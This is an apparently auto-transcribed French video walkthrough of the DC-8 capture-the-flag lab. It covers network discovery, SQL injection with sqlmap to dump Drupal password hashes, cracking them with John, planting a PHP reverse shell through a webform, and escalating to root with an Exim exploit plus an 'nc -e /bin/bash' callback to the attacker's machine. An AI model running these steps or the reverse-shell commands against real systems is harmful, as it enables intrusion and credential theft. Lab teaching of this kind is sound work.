Bonjour et bienvenue sur ma chaîne YouTube. Comme on l'avait annoncé au niveau de la vidéo présentative, là on va essayer de traiter notre premier CTF. Et le CTF qu'on va prendre en premier, c'est le DC. Maintenant, avant de faire cette vidéo, je vous conseille de voir la vidéo présentative qui vous explique les prérequis, parce qu'il y a des prérequis avant de pouvoir le faire. N'hésitez pas à aller les checker, le lien sera au niveau de la description, voilà, comme d'habitude. Maintenant, pour télécharger notre CTF, on va ouvrir notre navigateur et on va aller sur vulnerable.com, je pense que c'est comme ça, ou bien on va aller sur Google, voilà. On va faire DC8, voilà, download. Voilà, c'est ce premier lien là. Voilà, vous allez voir VulnerUp, c'est ce site là. Voilà, c'est ce site là qu'on va récupérer notre CTF. Voilà, maintenant description de notre CTF. Bon, là quand même il n'y a pas la possibilité de le traduire en français parce que j'utilise pas Google Chrome. Voilà, bon, mais si vous utilisez Google Chrome, vous avez la possibilité de lire en tout cas la description en français. Voilà, maintenant pour le télécharger, vous allez venir juste en haut là et vous allez cliquer ici download qui est là. Voilà, et là automatiquement il va vous demander l'emplacement. Moi je l'ai déjà téléchargé, comme vous l'avez remarqué, il est là. Voilà, qu'est-ce que je vais faire? Je vais juste décompresser. Je vais le décompresser. Voilà, DC8. Voilà, il est là. Voilà. Maintenant, moi, je vais le déplacer au niveau de mes machines virtuelles. Les machines virtuelles se trouvent quelque part ici. Voilà, ça est là. Maintenant, je vais le mettre là. Je vais le copier là. Voilà. Ensuite, je vais ouvrir mon VMware. Si vous avez un VMware, vous utilisez ça. Si vous n'avez pas VMware, vous pouvez utiliser VirtualBox. Voilà. Ensuite, là, je vais cliquer ici, Open a Virtual Machine. Voilà, pas Create, mais plutôt ouvrir, parce que la machine virtuelle existe déjà. Vous allez vous rendre au niveau de votre emplacement, là où vous avez mis votre votre CTF, voilà, et là vous le cliquez pour l'ouvrir. Voilà, en passant maintenant là vous allez créer à nouveau un chemin vers notre le chemin. C'est je descends un peu, il est où encore? Document, voilà, c'est ici. Ensuite virtual ici, je vais créer un autre dossier que je vais appeler, ou bien je le mets au niveau de même emplacement. Je vais supprimer ça, je vais le mettre au même emplacement que notre truc là. Voilà, et je vais donner un nom, CTF, et je vais importer. Voilà, on attend l'importation. Voilà, on attend importation. Voilà, maintenant une fois le CTF importé, bon là, je vais le renommer et donner un nom encore plus, voilà, CTF, je vais faire DC8, vu qu'on aura à faire beaucoup de CTF. Voilà, et là donc du coup, on peut créer aussi un nouveau fichier où on va mettre tous nos CTF. Par exemple, je vais mettre CTF. Voilà, comme ça on va mettre tous nos CTF ici. Voilà, comme ça une fois, parce que nous aura à faire beaucoup de CTF, vu qu'on aura à faire beaucoup de CTF, donc à chaque fois qu'on fera un CTF, on va le glisser au niveau de ce dossier. Voilà, maintenant là
notre réseau est en bridge. Donc là aussi, il faut respecter. Bon, je vais utiliser Kali de mon côté par rapport à cette fois-ci. Bon, on va alterner. Hein, voilà, on va utiliser tous les deux quand même. Ne vous inquiétez pas pour ça. Voilà. Maintenant là, il sera sous bridge. Voilà. Comme ça, ils seront au même niveau. Voilà. Maintenant, je vais démarrer Kali Linux. Voilà. Voilà. Entre-temps, j'ai démarré mes deux machines. Le CTF et notre machine Kali Linux qui va nous permettre d'effectuer les tests. Voilà. Maintenant, comme vous le voyez ici, j'ai aucun accès sur ça. J'ai ni l'adresse IP, je ne sais pas, parce que ça, je peux le considérer comme un serveur et j'ai vraiment rien du tout sur ça. Mais il y a une seule chose que je sais, c'est qu'on est connecté au niveau du même réseau. Donc, logiquement, la première chose à faire, c'est de vouloir, en tout cas, récupérer l'adresse IP de notre serveur. Voilà, c'est la chose qu'on va faire en premier. Maintenant, là, je suis en tant qu'invité, donc du coup, qu'est-ce que je vais faire? Je vais me connecter en tant qu'administrateur. Maintenant, pour se connecter en tant qu'administrateur, bon, je vais augmenter la taille peut-être. La vue. Bon, c'est pas grave. Maintenant, je vais faire sudo -i. Voilà, ensuite je vais donner mon mot de passe. Voilà, maintenant là, j'espère que l'écriture c'est clair parce que là, je voulais vraiment augmenter la taille. Voilà, c'est ici, zoom. Voilà. Voilà. Maintenant, première chose à faire, c'est utiliser Net Discord. Voilà, il va nous permettre de récupérer, en tout cas, les adresses IP qui sont connectées au niveau de notre réseau. Voilà. Maintenant, si vous voyez bien, il y en a pas mal. Et on patiente. Parce que là, il scanne tout mon réseau, en fait. Tout mon réseau. Voilà. Il y a tous ces appareils qui sont connectés au niveau de mon réseau. Parce que c'est un réseau bridge. Donc, il va faire office du réseau de notre... Il va même mapper, prendre les adresses IP et les adresses MAC qui sont connectées au niveau de mon Wi-Fi. Voilà, c'est la configuration que j'ai choisie. Maintenant, vous pouvez aussi, parce que je voulais consommer dans une situation réelle. Maintenant, je pouvais le mettre en local, comme adresse, changer la configuration, cette configuration et le mettre dans une situation encore plus allégée, c'est-à-dire où on ne va pas galérer pour trouver, en tout cas, toutes les informations. Voilà. Toutes ces informations, c'est-à-dire tous ceux qui sont connectés au niveau de notre réseau. Voilà, maintenant là, si on voit bien, ce qui est important, c'est quoi? C'est ça. C'est ça qui est important. Parce que là, si j'ouvre un nouveau terminal, je fais if config par exemple. Là. If config. Voilà. Nous, notre adresse IP, c'est ça. Voilà, pour ne pas le prendre à nouveau. Maintenant, l'adresse IP que je cible, en tout cas, moi personnellement, que je pense que c'est celui-là. Voilà, parce que c'est lui, parce que les autres, c'est des smartphones, comme vous le voyez. Voilà, c'est des smartphones, donc sûrement, ça va être lui. Bon, on va voir. On va ouvrir un nouveau terminal pour le faire, nouveau onglet. Voilà, et je vais augmenter un peu. Voilà. Et maintenant, on va voir est-ce que l'adresse IP qu'on a reçue, qui est là, est-ce que c'est le bon? C'est .23. Maintenant, on va utiliser Nmap. Nmap va nous permettre de voir est-ce qu'il y a des failles sur l'adresse IP. Voilà, on va faire Nmap. Nmap. Grand A. Maintenant 192.168.1.23. C'est ça qu'on avait dit. Voilà. Maintenant on patiente. Voilà. On patiente pour voir est-ce qu'on peut récolter des informations et tout ça. Voilà. Donc c'était, on peut dire ça c'est notre serveur parce qu'il n'y a pas, il y a des informations
Il y a des systèmes, voilà, on va décortiquer ça. Donc, je peux arrêter ce scan pour dire que voilà, ça suffit. J'ai trouvé l'adresse IP. Parce que là, il n'y avait que lui qui est suspect. Amazon, ça ne pouvait pas être lui. Intel, Samsung, tout ça, c'est des smartphones, on est d'accord. Mais dans ma tête, j'utilise un VMware. Donc, sûrement, si le nom commence à VMware, donc il n'y a pas à vérifier toutes les adresses IP. Par contre, si c'était dans la vie réelle, il fallait vérifier toutes ces adresses IP. Voilà, moi, je me passe de ça. Maintenant, là, si vous voyez bien ici, on a des ports qui sont ouverts. Parce que là, cette commande-là nous a permis de voir les ports qui sont ouverts. Maintenant, si on voit bien ici, il y a le port SSH qui est ouvert. Ça, c'est vraiment important. Il faut noter. Ensuite, il y a le port HTTP qui est ouvert. Et là, on vient de découvrir aussi que, par exemple, là, il y a des fichiers. Voilà, tout ça, c'est des détails vraiment importants qu'il faut signaler, qu'il faut noter. Voilà, et aussi là, c'est hyper important. Le Dropple, ça veut dire que c'est un site. Bon, pour voir, est-ce que c'est... Parce que le Dropple, c'est comme... pour ceux qui utilisent WordPress, c'est comme WordPress. Voilà, il vous permet de créer des sites. Maintenant, si j'ouvre mon navigateur et je tape cette adresse-là, on va voir ce qu'on aura. 192.168, bon, je vais le taper en même temps que vous. 192.168.1.23. On va voir, est-ce que c'est un site? Voilà, il nous a permis de voir que il y a un site qui est là. Voilà, vu que maintenant on sait que notre serveur DC8, comme je peux l'appeler, est construit à la base d'un CMS. Un CMS, on peut dire pour le plus connu, c'est WordPress, voilà, pour vous donner une idée. Donc, du coup, qu'est-ce qu'on pourra essayer de faire? Est-ce qu'on ne peut pas essayer d'attaquer directement la base de données pour avoir peut-être des informations? Parce que tout site web a une base de données à côté. Maintenant, on va voir est-ce qu'il est vulnérable à ce qu'on appelle des requêtes SQL ou des injections SQL, autant pour moi. Maintenant, pour le vérifier déjà au niveau de l'URL, vous ajoutez point d'interrogation. Maintenant, vous faites nit est égal à 1. Est égal à 1. Voilà, comme ça. Et on va vérifier. Et là, vous voyez que il nous affiche un message d'erreur. Donc, du coup, on peut dire que là, il est vulnérable. Parce que si ça répond, si ça essaie de répondre, ça veut dire qu'il y a un problème. Maintenant, ce problème-là, on va essayer de l'exploiter pour voir. Parce qu'il y a ce qu'on appelle des zéros positifs. C'est-à-dire, vous allez croire que c'est une faille, or ce n'est pas un. Voilà. Donc, on va juste essayer de voir est-ce qu'on aura accès à la base de données. Voilà. Maintenant, à nouveau, je vais me rendre au niveau de mon terminal. Tout se fait au niveau du terminal. Hein, voilà. Là, je vais faire SQL. Je vais me connecter en tant qu'administrateur déjà. Voilà. Voilà, admin. Maintenant, qu'est-ce que je vais faire? Je vais faire SQLT. SQL map. Maintenant, point U. Et on va aller copier l'URL avec l'erreur. Cette URL là, on va le copier. Voilà. Et on va le coller ici. Voilà. On va le coller. Voilà. Voilà, maintenant là, on va analyser en patiente. On va laisser analyser. C'est lui qui fait tout le travail. Voilà. Maintenant là, on va faire entrer. Il va continuer. Au lieu de faire ça, on peut cliquer directement sur entrée. Voilà. Là aussi, entrée. Entrée. Voilà. On patiente. Il effectue le travail.
Voilà, maintenant là, il y a ça qui nous prouve que c'est pas du zéro positif et il nous montre carrément que il est vulnérable. Donc on peut continuer à voir, en tout cas, qu'est-ce qu'on peut récupérer au niveau de la base de données. Voilà, parce que là déjà, on sait que c'est pas en tout cas c'est quelque chose d'énorme en fait. Il y a une faille au niveau de la base de données. Maintenant, il va falloir voir comment faire pour exploiter cette faille pour pouvoir soit récupérer des informations ou bien donner des informations, en tout cas faire quelque chose là-dedans. Maintenant qu'on sait que il n'y a que l'utilisateur, un simple utilisateur qui utilise la base de données, mais quand même on peut essayer par exemple de voir c'est quoi le nom de la base de données. On va essayer de le récupérer parce que c'est important, on peut récupérer la base de données. Mais non, là je vais rappeler la commande et je vais faire db. Là, si je compile, c'est juste pour pouvoir récupérer le nom de notre base de données. Et là, bingo, on a deux bases de données. Cette base de données là, c'est juste voilà quelque chose de bidon, il n'y a rien dedans. Maintenant, c'est ce nom là parce que dans toutes les bases de données, il y a information schéma. Voilà, pour ceux qui ont déjà travaillé sur des bases de données, vous en savez quelque chose. Maintenant là, vous allez remarquer il y a D7DB. Et dans ce cas-là, c'est cette base de données-là qu'on va essayer de récupérer ces tables. Voilà, maintenant, je vais rappeler la commande. Maintenant, on va faire D et on va donner le nom de notre table, de notre base de données, c'est D7BD. DB. Voilà, et ensuite, on va faire tables. Voilà, pour récupérer les tables. On patiente. Voilà, il y a en tout cas, tous les tables sont là. Voilà, exemple, il y a système, il y a action, voilà. Vous pouvez voir, il y a vraiment des choses. Maintenant, nous, on va s'intéresser aux users, c'est-à-dire les utilisateurs. Exemple là, je peux m'intéresser au niveau des utilisateurs. Et on va essayer de récupérer les colonnes de l'utilisateur. Parce que chaque base de données, pour ceux qui ont déjà suivi ma formation sur les bases de données aussi, n'hésitez pas à les checker. Je vais vous laisser cette formation au niveau de la description. Voilà, maintenant, si vous remarquez bien, dans chaque table, en tout cas, il y a des colonnes. Voilà, on va essayer de récupérer les colonnes de ce dernier. Maintenant là, je vais rappeler toujours la commande. Voilà, T, je vais faire user. Voilà, et je vais faire colonne. Je valide. Voilà. Coulomb. Voilà. Je l'ai écrit en français. Voilà. Voilà, on patiente. Voilà. Maintenant, là, si vous remarquez bien, on dit chaque utilisateur, par exemple, il y a le nom, ben, c'est important. Il y a le mot de passe. Je pense que ça signifie mot de passe. Voilà pour eux. Bon, on va en tout cas essayer. Là aussi, il y a des photos. Voilà, il y a en tout cas pas mal de choses qu'on pourra récupérer ici. Mais nous, on va essayer de dumper juste le nom et le mot de passe. C'est ça qui nous intéresse. Peut-être et la langue. Dans la langue qu'il parle. Voilà. Exemple là, pour récupérer ces informations-là, je vais toujours rappeler la commande. Voilà, c'est. Maintenant, on va récupérer quoi? Déjà, on a dit langue. Voilà. Ensuite, le nom, name. Ensuite, passe. Et on va le dumper, c'est-à-dire récupérer. Voilà. Et on valide. Voilà. Maintenant là, bon, pour langue, il n'y a rien. Ils n'ont pas donné des informations là-dedans. Voilà. Maintenant, pour le nom, il y a quelqu'un qui est l'admin. Le mot de passe est là. Voilà. Ne vous inquiétez pas, on va essayer de le déchiffrer. Voilà. N'ayez pas peur. Voilà. Ensuite, il y a John aussi. Il y a deux utilisateurs. Il y a John. Et le mot de passe de John est là. Voilà. Maintenant, comme vous l'avez remarqué ici, les mots de passe sont hachés. Donc, du coup, c'est impossible. Tant qu'on ne le décortique pas, c'est impossible de les utiliser. Voilà. C'est comme si c'est un mot de passe
mais à l'envers. C'est-à-dire, on ne peut pas l'utiliser comme ça. Il va falloir déchiffrer le message. C'est comme si un bonjour qu'on a transformé comme ça. Et donc, on va essayer d'utiliser les outils à notre disposition qui sont gratuits pour décortiquer en tout cas le message, en tout cas les mots de passe qui sont là. Et là, on peut utiliser John qui est déjà disponible sur Kali Linux et Parox. Donc du coup, on peut l'utiliser facilement. Et là, ce qu'on va faire, c'est on va créer déjà notre fichier password, voilà, et on va mettre les mots de passe hachés. Mot de passe haché, par exemple là, voilà, il attend les mots de passe, donc je vais copier le premier, voilà, je le copie et je le colle ici. Voilà. Ensuite, le deuxième. Voilà. Il faut le copier correctement. Voilà. Sinon, vous aurez des surprises. Vous copiez tout. Voilà. Et je le colle. Entrée. Et je vais faire CTRL-C pour quitter. Voilà. Maintenant, je vais vérifier est-ce que le contenu a été bien copié. Je vais faire password. Voilà. On a le contenu qui est là. Voilà. Maintenant, on va utiliser John. John, déjà, pour ceux qui ne le savaient pas, il a déjà un dictionnaire avec lui. Donc, n'hésitons pas à utiliser le dictionnaire de John, qui est déjà là, pour voir ce que ça va donner. Hein. Voilà, maintenant là, on va faire, par exemple, John. Pour utiliser John, on va faire John plus le mot de passe. Et comment le fichier qui contient notre mot de passe, et on l'avait appelé password.txt. On va valider. Voilà, vous voyez, c'est ça qu'il va utiliser. Voilà, on vient de récupérer. Attendez, on patiente un peu, il fait le traitement d'abord, mais quand même, il a utilisé son word list, c'est-à-dire ses listes de mots de passe. C'est ça qu'il utilise ici. Voilà, on patiente. Voilà, maintenant, si ça prend trop de temps, vous pouvez faire CTRL-C pour écorcer le déroulement du travail. Mais quand même, notez bien que on a un utilisateur qui a comme mot de passe title et on a deux utilisateurs. Donc, ça peut être que John ou bien admin. Voilà, mais j'ai des fortes raisons. Bon, on va tester en tout cas pour les deux. Mais là, on a un mot de passe, mais on ne sait pas comment faire pour l'utiliser. Voilà, parce que on sait que, par exemple, au niveau de la base données, il y a un utilisateur qui s'appelle John ou admin, qui a comme mot de passe, title. Mais on ne sait pas comment faire pour utiliser ça. Maintenant là, on peut utiliser there pour voir tous les sous-sites de notre site qui est là. Voilà, de notre site. Voilà, parce qu'il y a des sous-liens qu'on peut avoir. Maintenant, pour voir les sous-liens, comme je l'ai dit, on va faire there. Maintenant, 192.168.1.23. Voilà. HTTP, excusez-moi. HTTP 2. / Voilà. Voilà. Maintenant, il fait des recherches. On patiente. Il va voir, en tout cas, tous les URL qui existent. Ça prend du temps. Voilà. Voilà, vous voyez, il est en train toujours de vérifier tous les liens, en tout cas, tous les URL qui existent sur cette page-là. Mais il y a quelque chose qui m'a tapé à l'œil lorsque je vais, parce que je ne veux pas attendre qu'il termine tout le processus, parce qu'il y a vraiment pas mal de choses à faire pour pouvoir, en tout cas, analyser ce qui se passe sous mes yeux. Maintenant là, en analysant, j'ai vu un URL user. Pourquoi ça m'a marqué, je vais vous expliquer. Bon, je vais ouvrir un autre éditeur. Je vais faire Gedit, juste pour avoir une page, par exemple, je vais l'appeler page, ou bien détail, juste pour vous expliquer ce qui m'a marqué. Voilà.
Je l'ai pas installé. Bon, moi je croyais que je l'avais installé. Je vais faire yes. Ok. Moi qui croyais que je l'avais déjà. On va mettre la vidéo en pause le temps qu'il installe Gedit. Voilà, maintenant une fois Gedit installé, on va rouvrir. Voilà, maintenant, au début on a l'URL. L'URL qui est, bon, je vais faire URL ou bien adresse IP. URL ou IP adresse. Voilà. IP adresse ou bien adresse IP. On avait remarqué que c'était 192.168.1.23. Ensuite, on a vu une faille par exemple, faille trouvée, c'était au niveau du SSH, les ports en tout cas, les ports ouverts. Bon, ça c'est important à noter. Moi, je l'avais déjà, voilà, j'ai reçu le séminement, mais quand même, vous, à fur et à mesure que vous avancez, il faut noter ce que vous avez trouvé, parce que c'est pas à coup sûr que vous allez, en tout cas, trouver le résultat le même jour. Donc, il va falloir marquer tout ce que vous avez trouvé. Voilà, c'est un bon démarche. Je suis désolé, je devrais vous le signaler dès le début. Ensuite, il y avait les deux ports qui étaient ouverts. Ensuite, on avait drap, je ne sais pas quoi. Par exemple, le CMS. On avait trouvé un CMS. Bon, le CMS, après, je vais revenir pour voir le CMS parce que le CMS, je n'ai pas retenu son nom. Parce que c'est pas trop connu, mais c'est un CMS. Voilà. Ensuite, on a trouvé une faille au niveau de la base de données. Faille SQL. On avait injection SQL. Voilà. Et privilège, on avait on avait vu que, on avait remarqué que au niveau des privilèges, il n'y avait que le user. Voilà, c'est pas un utilisateur. Ensuite, on avait pu récupérer, dumper la base de données. Maintenant, au niveau de dump, on a la base de données BD, DB. On avait dit c'était D7DB. Ensuite, table. On avait la table user. Voilà, vous voyez le fameux user, ça revient. Et on a, par exemple, au niveau de user, table user, on avait des colonnes. Voilà, colonne, comme je l'avais écrit tout à l'heure en français, or que c'est en anglais. Maintenant, user, on avait name et pass. Voilà, vous voyez. Donc, si on a un URL qui comporte user, donc ça c'est normal que suscite notre, voilà, de vérifier. Là, on a un URL que je vais déjà copier directement. Je vais copier directement ici. Et il est où? Bon, là, il est en train, je pense, toujours de vérifier. Mais là, cet URL-là mérite qu'on vérifie qu'est-ce qu'on a là-bas. Parce que d'après le démarche qu'on a fait, on a quelque chose en tout cas qui touche directement à user, ouais, et qu'on a un user lien, donc il va falloir aller vérifier l'information. Bon, je vais aller ajouter user pour voir est-ce qu'il n'y a pas quelque chose qu'on ne peut pas avoir. Ah, bingo, vous voyez, là, c'était une fonction cachée. On ne pouvait pas, normalement on ne pouvait pas le deviner parce que là, il n'y a nulle part où on pouvait passer pour récupérer. Mais là, on sait que maintenant les utilisateurs passent par là pour s'authentifier au niveau de la plateforme. Voilà, donc je vais essayer de me loguer en tant qu'utilisateur. Bon, au niveau de là, peut-être information user. Au niveau de user, on avait John, n'est-ce pas? John, comment on l'avait, excusez-moi, comment on l'avait et tout ça. Voilà, comme je l'ai dit, il va falloir avoir l'habitude de toujours noter ce que vous avez trouvé. Voilà. Maintenant, il y a John qu'on écrit comme ça. Voilà, John.
Et ensuite, il y a le mot de passe title. Je vais le copier. Il est où? Waouh. Voilà, il est là. Bon. C'est utilisateur. Les deux, je crois. Si je copie John. Ensuite, passe. Password. Voilà. Title. Maintenant là, je vais revenir au niveau de la page. Je vais faire John. Et je vais coller le mot de passe. Je fais le login. Voilà. Donc, ça veut dire que le mot de passe John, ça fonctionne vraiment très bien. Déjà, ça, c'est quelque chose de génial. Là, je suis au niveau de leur, en tout cas, de leur propre structure. Voilà, de leur propre page. Donc, j'ai accès. Voilà, mais ça ne suffit pas. Parce qu'avoir accès tout simplement, c'est facile. Mais comment faire pour aller récupérer des informations et tout ça, voilà, c'est ça qui sera plus important même maintenant. Voilà, maintenant on s'est connecté en tant que John. Donc du coup, on va essayer de voir ce qu'on pourra faire pour en tout cas privilégier. Parce que là, on est en tant qu'utilisateur. Donc il va falloir qu'on essaie d'augmenter un peu nos privilèges pour avoir plus d'autorité en fait sur la page. Voilà. Parce que là, John, on dirait que c'est juste un employé. Là, on va voir qu'est-ce que John peut faire et essayer peut-être d'exploiter la faille. Par exemple, là, si par exemple j'essaye en tout cas de faire un tour, là, je vérifie juste pour voir ce que je peux avoir. Bon, pour voir. Là, si on essaie d'éditer, là, on voit que John a la possibilité d'éditer. Donc, normalement, bon, supposons que on nous donne accès. Voilà, John peut éditer du texte. Donc, c'est bien. Maintenant, quel type de texte il peut éditer? On a dit, il peut être HTML. Ah, voilà, notre fameuse PHP code. Donc, il peut insérer des codes PHP. J'avais un script là que je vais vous passer, voilà, ne vous inquiétez pas, qui me permettait d'avoir en tout cas la main sur les commandes, c'est-à-dire sur le CMD. Voilà. Donc du coup, si je l'exploite, je vais essayer de l'exploiter pour voir ce que ça donne. Déjà là, je vais mettre l'adresse IP. L'adresse IP c'était 192.168.1.23. Voilà. Là, l'adresse IP, non, mon adresse IP c'est .22, si je me trompe. Attendez, je vais vérifier l'adresse IP que j'ai. Une petite minute, config, voilà, j'ai .22, c'est bon. Là, je le remplace par .22. Et là, notre port d'écoute c'est 1, 2, 3, 4. Voilà, maintenant je vais copier ce script là. Voilà, c'est juste cette partie-là qu'il faut modifier. Mettre votre adresse IP. Je vais copier le script. Voilà, je vais le sauvegarder sans enregistrer autant pour moi. Je ne vais pas l'enregistrer. Et là, je vais copier le script ici. Voilà. Maintenant là, je vais sauvegarder. Voilà. Maintenant sur ce script, il va falloir qu'on active l'écoute. Voilà, par exemple là, et avant de quitter, attendez, je reviens sur là où j'ai mis le script. Voilà. Maintenant, si vous remarquez bien, le script, c'est au niveau de user contact use. Voilà, donc c'est là-bas où, si je clique, on va avoir une réponse en fait. Voilà, on va avoir un retour. Maintenant, avant de mettre les données ici, parce que c'est ici, ça correspond à ici, qu'est-ce que je vais faire? Je vais ouvrir mon navigateur comme adresse l'éditeur, parce que lui, on dirait qu'il est toujours en train de travailler. Voilà, moi je peux l'arrêter parce que j'en ai plus besoin. J'ai eu une information capitale que je peux exploiter maintenant. Maintenant là, -lvp, port d'écoute c'est 1, 2, 3, 4. Voilà, au niveau du script, c'est ça qu'on avait dit. Maintenant,
je vais lancer. Maintenant, je vais lancer l'écoute. C'est bon. Ensuite, je vais venir ici comme si je demandais une information. Bon, je vais dire devs. Voilà mon nom. Ensuite, mon mail, c'est devsec@sn pour dire que je suis au Sénégal. Voilà. Maintenant, je vais dire abonner. Abonner. Voilà, les gars, n'hésitez pas à s'abonner, à partager et surtout de me bombarder des likes. Aimer la vidéo. Voilà. Les gars, n'hésitez pas à le faire pour m'encourager à vraiment faire ce genre de vidéo là. Maintenant là, si je compile, je vais voir est-ce que j'ai quelque chose. J'ai toujours pas quelque chose. On va passer. Voilà, c'est bon. J'ai quelque chose à ce niveau. Voilà. Et là, tout ce qui se passera ici, ce n'est plus de mon sort parce que là, j'ai eu quelque chose. Voilà. Maintenant, on va essayer de faire quelques manipulations. Déjà, je vais me déplacer au niveau de ETC pour voir. Voilà, bingo. Je vais faire un ls pour afficher tout son contenu. Voilà, vraiment, il y a des choses que je peux avoir là. Voilà, comme notre fameuse password. Je vais afficher le contenu de password. passwd. Voilà, bingo. Maintenant, je vais me déplacer au niveau de temps pour voir est-ce que je peux effectuer certaines manipulations. Par exemple, je vais voir les permissions. Par exemple, tirer perm. Voilà, maintenant, use. Voilà, vous voyez, il y a les permissions qui sont bon. Là, j'ai pas de permission, c'est normal parce que actuellement, je suis un simple utilisateur en fait. Maintenant, si je fais, attendez, voilà, là, on sait que c'est moi, mais quand même, si je peux aller plus loin, je vais faire find et je vais faire un petit filtre, tirer perm, voilà. Maintenant, use est égal à s2. Maintenant, dev nul, last nul. Voilà, peut-être il y a ces fichiers là, ils sont importants. Maintenant là, il y a un fichier qui, voilà, que je peux peut-être exploiter. Ce fichier là, je peux peut-être l'exploiter. Je vais ouvrir un nouveau terminal. Voilà. Celui-là, je vais le fermer. Maintenant, je vais faire sudo -i. Voilà. Je vais augmenter un peu l'écriture. Voilà. Maintenant, là, on remarque que il y a Exim qui est utilisé ici. Voilà, Exim, comme vous le voyez, c'est une faille qui est là. Maintenant, je vais voir la version. Par exemple, les failles qui sont disponibles sur Exim. Par exemple, je vais faire cherche, voilà, Exim, voilà. Voilà, là, on va voir parce que là, il nous donne des versions qui ont des failles. Maintenant, je vais faire ça côte à côte. J'espère que, bon, malheureusement, je pense que je ne peux pas les décoller. Maintenant, on va essayer de voir la version utilisée au niveau de notre système. Je vais faire Exim 4 version. Voilà. Nous passons pour voir la version. Voilà. Maintenant là, on a la version 4.9. Voilà. Avec la version 4.89, qu'est-ce qu'on peut faire? Là, c'est dans cet intervalle. Bon, il est ici, peut-être. Là, on peut augmenter nos privilèges. Ça, c'est génial. Maintenant, là, il correspond à qui? Bon, je vais faire ça. Attendez. Là, je vais faire ça. Parce que c'est celui-là. Celui-là que je vais utiliser moi. Maintenant, ça correspond à qui? Ça correspond à celui-là. Voilà, c'est très bien. Donc, du coup, qu'est-ce que je peux faire? Je peux copier ce sommet-là vers là.
je peux le copier. Je vais faire cd slash user slash char, maintenant slash exploit, où se trouvent mes exploits, exploit db exploit maintenant Linux local, voilà. Ensuite, bon, si je fais ça, je vais faire ls, voilà, il y a tous ces exploits, mais nous, c'est l'exploit, c'est cet exploit là qu'on voudrait déplacer. Voilà, c'est le, il est où? Voilà, celui-là qui nous permet, c'est le 46 990, voilà, c'est 996. C'est celui-là qu'on va déplacer au niveau de notre dossier var wv pour qu'il puisse être exécuté. Donc je vais faire cd 46 996, cp, je dois dire cp pour copier. Maintenant 406 99, voilà, 96. Maintenant on va le déplacer au niveau de var, voilà, www html, voilà. Maintenant on va le copier ici, voilà. Maintenant on va se déplacer au niveau de var, voilà, www html, voilà. Maintenant si je fais un ls, voilà, il est là, voilà. Ensuite on va essayer de l'exécuter, on va exécuter, on va faire os de Unix, voilà, et on va exécuter 46, voilà, l'exploit qui est là, voilà. Maintenant il est en format Linux. Maintenant si je fais ls à nouveau, voilà, c'est bon, on a tout. Maintenant on va le déplacer, on va le renommer 46 et on va le renommer à exim, voilà, exim rce.sh, voilà. Et là je vais démarrer mon service Apache, service Apache 2, voilà, star, on patiente, voilà. Maintenant là on va faire un wget, là on va faire un wget ici, excusez-moi, pour télécharger maintenant, parce que là ici qu'est-ce que j'ai fait? Pour ceux qui n'ont pas compris Apache, c'est comme si j'ai créé un serveur qui contenait par exemple un script, vous comprenez? Maintenant le script se trouve au niveau de mon PC qui est là. Maintenant je vais essayer de le mettre, de tenter de l'exécuter au niveau de notre serveur, voilà, parce que ça c'est notre serveur, voilà. Là c'est ma machine Kali Linux, et là c'est le terminal de notre serveur. C'est ici qu'on va essayer de uploader notre fichier qu'on vient de créer, qui a comme nom exim-rsc, voilà. Et on va essayer de le télécharger ici. Maintenant on va mettre lc, maintenant l'adresse, mon adresse c'est 192.168.1.22, voilà. Maintenant là, ensuite on va donner le même nom qu'on avait utilisé ici. Le même nom qu'on avait utilisé, c'est exim-rce, exim-rce.sh, voilà. Là c'est fait, voilà. Maintenant on a téléchargé le script. Maintenant ce script là, si jamais on parvient à l'exécuter, normalement on doit avoir l'accès root, voilà. Donc prions que ça fonctionne cette fois-ci. Là je vais créer un autre fichier pour un autre terminal, voilà. Je vais créer un autre et le positionner là, bon. Voilà.
Maintenant là, je vais se connecter en tant qu'administrateur. Voilà. R2ET. Maintenant là, pour celui-là, je vais mettre à l'écoute le terminal. C'est au niveau de l'autre que je vais essayer, par exemple, d'exécuter le programme qu'on vient juste de faire. Voilà, maintenant au niveau de celui-là, je vais faire juste un NC. Voilà, NC-LVP. Maintenant le port d'écoute c'est 4444. Voilà, c'est juste un port d'écoute. Maintenant là, je vais faire bash exim. C'est exim comme ce fichier là. C'est ce fichier là qu'on va exécuter. Parce que c'est un fichier bash. Les fichiers bash terminent par SH. Voilà. Maintenant, là, je vais faire exim rcr.sh. Voilà. Maintenant là, -m net4. Voilà. J'exécute pour voir. Voilà. Je vais faire un nc encore. nc-e /bin. Voilà. On dirait que ça va fonctionner mieux. Voilà, on va faire. Là, l'accès m'a été refusé. Bon, je vais me pointer déjà pour l'écoute. Je vais me pointer déjà au niveau de CMD, au niveau du dossier var, voilà, wx www.html. Voilà. Maintenant, je vais refaire l'écoute. Et là aussi, je vais lancer notre bash exim rce.sh. Voilà, net4. Voilà, on va retenter pour voir ce que ça va donner. On patiente un peu. On patiente. Voilà, il est open maintenant. Là, on nous avait bloqué l'accès. Ouais, maintenant là, c'est open. Maintenant, pour avoir accès, on va faire nc-e. Voilà, maintenant /bin /bash. Voilà, /bash. Maintenant, je vais donner mon adresse IP 192.1.1.22 si je ne me trompe pas pour l'adresse. Maintenant, pour l'écoute, on a pris ici 4444. Maintenant, voilà. Maintenant là, OMI. Voilà, si je fais CD /root. Voilà, normalement. Maintenant, si je fais ls, voilà, j'ai mon flag. Si je fais 4 flag.txt, et là, bingo, we are done. On a fini la mission. On a accès à toutes les informations. Voilà, c'est ça. Comme je l'ai dit, les likes et la vue, c'est ça qui va me permettre de tourner une autre vidéo. Si ce genre de vidéo là vous plaît, n'hésitez pas, vous savez quoi faire. Et on se donne rendez-vous, j'espère, très bientôt sur un nouveau chapitre sur les CTF. Merci les gars.